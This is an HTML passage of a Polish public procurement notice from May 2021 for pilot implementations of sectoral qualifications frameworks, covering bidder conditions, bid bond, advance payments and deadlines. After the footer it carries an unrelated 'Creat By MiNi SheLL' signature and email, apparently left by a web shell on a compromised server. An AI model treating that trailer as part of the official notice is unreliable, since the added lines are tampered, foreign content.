class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym; Zamawiający nie ma szczególnych<br/>wymagań w tym zakresie. Ocena spełnienia tego warunku odbędzie się na podstawie<br/>Oświadczenia o spełnianiu warunków udziału w postępowaniu (Załącznik 1 do SIWZ).2)<br/>uprawnień do prowadzenia określonej działalności zawodowej, o ile to wynika z odrębnych<br/>przepisów: Zamawiający nie ma szczególnych wymagań w tym zakresie. Ocena spełnienia tego<br/>warunku odbędzie się na podstawie Oświadczenia o spełnianiu warunków udziału w<br/>postępowaniu (Załącznik 1 do SIWZ).3) sytuacji ekonomicznej i finansowej tj. Zamawiający nie<br/>ma szczególnych wymagań w tym zakresie. Ocena spełnienia tego warunku odbędzie się na<br/>podstawie Oświadczenia o spełnianiu warunków udziału w postępowaniu (Załącznik 1 do<br/>SIWZ).4) zdolności technicznej lub zawodowej tj.: A. w odniesieniu do posiadania wiedzy i<br/>doświadczenia tj.; Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże się<br/>należytym wykonaniem, a w przypadku świadczeń okresowych lub ciągłych wykonywaniem w<br/>okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie: co najmniej jedną usługę wdrożeniową lub szkoleniową<br/>dotyczącą kompetencji lub kwalifikacji w danym sektorze (np. wdrożenie nowych procedur<br/>rekrutacji lub selekcji, identyfikacji zapotrzebowania na kompetencje, motywacji lub oceny<br/>pracowników; szkolenie lub kształcenie na potrzeby sektora, przy czym usługa lub usługi<br/>szkoleniowe musza obejmować min. 100 godzin i przeprowadzone mają być dla instytucji<br/>działających w sektorze. Za równoznaczne z wykonywaniem usługi, o której mowa wyżej,<br/>Zamawiający uzna identyczne zadanie wykonywane w ramach działalności własnej (statutowej)<br/>Wykonawcy. W takim przypadku, za dokumenty potwierdzające należyte wykonanie tych zadań<br/>Zamawiający uzna poświadczenia uczestników szkoleń (np. ankiety uczestnika) lub podmiotów<br/>korzystających z przeprowadzonych analiz. B. W zakresie dysponowania osobami zdolnymi do<br/>wykonania zamówienia: Wykonawca wykaże się posiadaniem zespołu osób, które będą<br/>uczestniczyć w realizacji zamówienia, spełniającymi poniższe warunki w zakresie<br/>doświadczenia: a) Koordynator projektu, mający doświadczenie w kierowaniu, zarządzaniu lub<br/>koordynacji co najmniej jednym projektem o wartości co najmniej 100 tys. zł. b) Ekspert ds.<br/>efektów uczenia się, uczestniczący w ciągu ostatnich 3 lat w pracach związanych z<br/>wykorzystaniem efektów uczenia się. Może to być np. udział w pracach eksperckich nad SRK,<br/>pracach związanych z opisem kwalifikacji, pracach nad podstawami programowymi lub<br/>programami kształcenia w szkołach wyższych. c) Ekspert branżowy, mający co najmniej<br/>dziesięcioletnie doświadczenie w pracy w branży wybranej do pilotażu oraz w ciągu ostatnich 3<br/>lat biorący udział (jako ekspert lub koordynator) w co najmniej jednym projekcie związanym z<br/>kompetencjami i kwalifikacjami w branży. Warunki udziału w postępowaniu są jednakowe dla<br/>każdej z części zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu wstępnego potwierdzenia spełniania warunków udziału, o których<br/>mowa w § 7 oraz w celu wstępnego wykazania braku podstaw do wykluczenia z postępowania<br/>określonych w § 6), wykonawca ma obowiązek złożyć wraz z ofertą oświadczenie o braku podstaw do<br/>wykluczenia z postępowania wg. załącznika nr 1 oraz o spełnieniu warunków udziału w postępowaniu<br/>wg. załącznika nr 2.1)Oświadczenia, o których mowa w ust. 1, stanowią dowód potwierdzający brak<br/>podstaw wykluczenia, spełnianie warunków udziału w postępowaniu, na dzień składania ofert,<br/>tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.2) W<br/>przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa<br/>w ust. 1, składa każdy z wykonawców. 3) Wykonawca, w przypadku polegania na zdolnościach lub<br/>sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniami, o których mowa w<br/>ust. 1, także oświadczenia podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby.2. Zamawiający przed wyborem<br/>najkorzystniejszej oferty wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia wymaganych<br/>podmiotowych środków dowodowych, tj . 1) zaświadczenia właściwego naczelnika urzędu skarbowego<br/>potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1<br/>pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia<br/>dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o<br/>dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca<br/>dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności;2) zaświadczenia albo innego dokumentu właściwej<br/>terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału<br/>regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i<br/>zdrowotne, w zakresie art. 109 ust. 1pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed<br/>jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub<br/>zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do<br/>udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności<br/>należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub<br/>zawarł wiążące porozumienie w sprawie spłat tych należności;3) odpisu lub informacji z Krajowego<br/>Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art.<br/>109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji; wszystkie wymagania określono w SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4) wykazu dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych<br/>również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy -<br/>w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>dostawy lub usługi zostały wykonane lub są wykonywane, którego wzór stanowi Załącznik nr 3 do<br/>SWZ wraz z załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są<br/>wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów -oświadczenie wykonawcy; w<br/>przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3miesięcy;5) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu /.../wszystkie<br/>wymagania określono w SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium w wysokości 3 000,00 zł (słownie: trzy tysiące złotych) przed upływem terminu składania ofert określonego w SWZ. Wadium należy składać odrębnie do każdej części.<br/>2.	Wadium może być wnoszone w jednej lub w kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2020 r., poz. 299)<br/>3.	Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy nr 18 1500 1012 1210 1000 1077 0000 z dopiskiem: Wykonanie pilotażowych wdrożeń wybranych Sektorowych Ram Kwalifikacji w zakresie rozwoju kompetencji w podmiotach branżowych (II Przetarg). Znak sprawy: IBE/16/2021.<br/>4.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą wpływu środków pieniężnych na rachunek bankowy, o którym mowa w ust. 3, przed upływem terminu składania ofert.<br/>5.	Wadium wnoszone w formach określonych w ust. 2 pkt 2-4, musi zawierać zobowiązanie gwaranta lub poręczyciela z tytułu wystąpienia zdarzeń, o których mowa w art. 98 ust. 6 ustawy Prawo zamówień publicznych. <br/>6.	Dla skuteczności wniesienia wadium w innej postaci niż pieniądz niezbędnym jest przekazania przed terminem składania ofert, za pośrednictwem Miniportalu/EPUAP-u, oryginału wadium w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez Gwaranta/Poręczyciela. Dokument nie może zawierać postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do gwaranta/poręczyciela. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Brak szczególnych wymagań. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1. Zamawiający może wypłacić Wykonawcy zaliczkę w wysokości odpowiadającej 30% wartości<br/>umowy, nie większej jednak niż 100 000,00 zł (słownie: sto tysięcy zł) brutto. Zaliczka wypłacana<br/>jest po podpisaniu umowy na pisemny wniosek Wykonawcy, w terminie do 7 dni od dnia złożenia<br/>wniosku.2. Zaliczka może być wypłacona powyżej kwoty 100 000,00 zł (słownie: stu tysięcy zł)<br/>brutto do wysokości 30% wartości umowy, pod warunkiem uprzedniego złożenia<br/>Zamawiającemu przez Wykonawcę zabezpieczenia w postaci gwarancji bankowej lub<br/>ubezpieczeniowej.3. Gwarancja musi dotyczyć całej wnioskowanej kwoty zaliczki oraz<br/>nieodwołalnie i bezwarunkowo uprawniać Zamawiającego, na jego pierwsze żądanie, do<br/>otrzymania kwoty odpowiadającej kwocie wnioskowanej zaliczki, w okresie od dnia wypłaty<br/>zaliczki (włącznie z tym dniem) do przewidywanego w umowie dnia jej rozliczenia, wydłużonego<br/>o 45 dni.4. W celu otrzymania zaliczki w części, o której mowa w ust. 2, Wykonawca składa<br/>Zamawiającemu wniosek o jej wypłatę. Wniosek powinien mieć formę pisemną pod rygorem<br/>nieważności. Na podstawie wniosku Zamawiający dokonuje wypłaty zaliczki w terminie do 7 dni<br/>od dnia złożenia w/w wniosku i gwarancji.5. Wykonawca wystawia Zamawiającemu fakturę<br/>zaliczkową i dostarcza ją niezwłocznie do siedziby Zamawiającego, nie później jednak niż w<br/>terminie 7 dni od dnia zapłaty. §3 ust. 6-9 umowy stosuje się odpowiednio.6. Wypłata zaliczki<br/>następuje na poniższy rachunek bankowy Wykonawcy: …………………7. Zaliczka rozliczana<br/>jest razem płatnością końcową, o której mowa w §3 ust. 2 pkt. b) umowy. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> ZAMAWIAJĄCY dopuszcza możliwość zmian treści zawartej Umowy w następujących<br/>okolicznościach: 1) konieczność wprowadzenia zmian (w szczególności w zakresie wydłużenia<br/>terminu jej realizacji) będzie następstwem zmian wprowadzonych w umowach pomiędzy<br/>Zamawiającym, a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi wdrażanie<br/>Programu Operacyjnego wskazanego § 12 Umowy, w ramach którego realizowane jest<br/>Zamówienie; 2) konieczność wprowadzenia zmian będzie następstwem zmian wytycznych<br/>dotyczących Programu Operacyjnego wskazanego w § 12 Umowy lub wytycznych i zaleceń<br/>Instytucji Zarządzającej lub Instytucji Pośredniczącej I i II stopnia, w szczególności w zakresie<br/>sprawozdawczości.3) konieczność wprowadzenia zmian w terminach realizacji zamówienia<br/>(jego poszczególnych etapów) będzie wynikała z przesłanek nieleżących po stronie Wykonawcy.<br/>Na tej podstawie nie jest jednak możliwe wydłużenie końcowego terminu realizacji<br/>zamówienia.4) Realizacja badania w kształcie opisanym w OPZ nie będzie możliwa, w<br/>przypadku zaistnienia siły wyższej, w tym w związku z pandemią COVID-19. W takiej sytuacji<br/>Zamawiający przewiduje możliwość zmiany terminów poszczególnych etapów, zmiany zakresu<br/>zamówienia, zmiany narzędzi zamówienia. 5) Uzasadniona jest zmiana podmiotów czy też<br/>stanowisk, w których będzie realizowany pilotaż. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-31 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Górczewska 8, 01-180 Warszawa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-31 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 17. Na ofertę składają się: 1) Wypełniony Formularz Ofertowy, którego wzór stanowi Załącznik nr<br/>6 do SWZ; 2) Oświadczenie o poleganiu na zasobach podmiotu trzeciego wraz z dokumentem<br/>potwierdzającym odstęp do tych zasobów o którym mowa w §7 ust. 5 – jeżeli ma<br/>zastosowanie; 3) Dokument wadium, o ile nie został wniesiony w pieniądzu, z zastrzeżeniem<br/>postanowień §6 ust. 6 SWZ– jeżeli wymagane przez SWZ; 4) Pełnomocnictwa osób<br/>podpisujących ofertę, przywołane w ust. 10 i 11 powyżej – jeżeli ma zastosowanie; 5)<br/>Uzasadnienie dla zastrzeżenia informacji stanowiących tajemnicę przedsiębiorstwa, opisane w<br/>ust. 3 powyżej – jeżeli ma zastosowanie; 6) Informacje o których mowa w art. 225 ust. 2 ustawy<br/>pzp, w sytuacji gdyby wybór prowadził do powstania u zamawiającego obowiązku podatkowego<br/>zgodnie z ustawą VAT – jeżeli ma zastosowanie. 7) Oferta merytoryczna, składająca się z:- na<br/>użytek oceny oferty przez pryzmat kryteriów wskazanych w §16i. Oceny zasadności<br/>wykorzystania wybranej SRK w podmiocie - Wykonawca powinien uzasadnić wybór konkretnej<br/>ramy do pilotażu oraz dlaczego winien być on przeprowadzony we wskazanym podmiocie. W<br/>szczególności należy zidentyfikować i wskazać problemy, na które możliwa jest odpowiedź z<br/>wykorzystaniem SRK. ii. Oceny zasadności wybranych działań z proponowanej przez<br/>Zamawiającego w pkt 2.3 OPZ listy w stosunku do działalności i potrzeb podmiotu – Wykonawca<br/>winien wskazać przynajmniej 3 działania pilotażowe (ocenie podlegają pierwsze trzy) oraz<br/>uzasadnić ich wybór. Istotne jest wskazanie, dlaczego mogą być one odpowiedzią na<br/>zidentyfikowane w podmiocie problemy. iii. Szczegółowego opisu planowanych działań –<br/>Wykonawca przedstawi opis wybranych przez siebie działań uszczegóławiający propozycje<br/>wskazane w punkcie 2.3 OPZ. W szczególności należy wskazać, jak zostaną wykorzystane<br/>charakterystyki poziomów wybranej SRK oraz wskazać narzędzia, które zagwarantują odpowiednią realizację pilotażu, jego założonych celów oraz umożliwią przekładalność jego<br/>wyników na inne podmioty. iv. Harmonogramu planowanych działań – Wykonawca winien<br/>rozpisać w ujęciu tygodniowym wstępny harmonogram projektu uwzględniając w szczególności<br/>kamienie milowe oraz terminy wskazane przez Wykonawcę w OPZ.- na użytek weryfikacji<br/>kompletności oferty: v. Listę podmiotów, w których planowana jest realizacja pilotażu, zgodnie z<br/>opisem w punkcie 2.3 OPZ, wraz z ich krótką charakterystyką oraz uzasadnieniem ich wyboru<br/>do tego przedsięwzięcia. vi. Kopia porozumienia o współpracy z podmiotami w których mają<br/>odbyć się pilotaże. Za równoważny dokument Zamawiający uznaje umowę konsorcjum.<br/>Dokument musi zawierać nazwisko i stanowisko osoby kontaktowej oraz jasne zobowiązanie do<br/>współpracy z Wykonawcami pilotażu przez okres realizacji niniejszego zamówienia. vii.<br/>Wskazanie co najmniej pięciu stanowisk obejmujących łącznie w podmiotach objętych pilotażem<br/>przynajmniej 150 osób oraz uzasadnienie ich wyboru w kontekście działalności podmiotu i<br/>wdrożenia wskazanej ramy sektorowej lub też przynajmniej 5 podmiotów, w każdym z nich co<br/>najmniej 2 stanowiska obejmujące przynajmniej po 5 osób każde wraz z uzasadnieniem ich<br/>wyboru. 7. Opracowania (projekty) wskazane w pkt 17 są niezbędnym elementem oferty. Brak<br/>takiego elementu stanowi o niezgodnością treści oferty z warunkami zamówienia i spowoduje, z<br/>uwzględnieniem możliwości zawartych w art. 223 ustawy, odrzucenie oferty na podstawie art.<br/>226 ust. 1 pkt 5 ustawy pzp.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com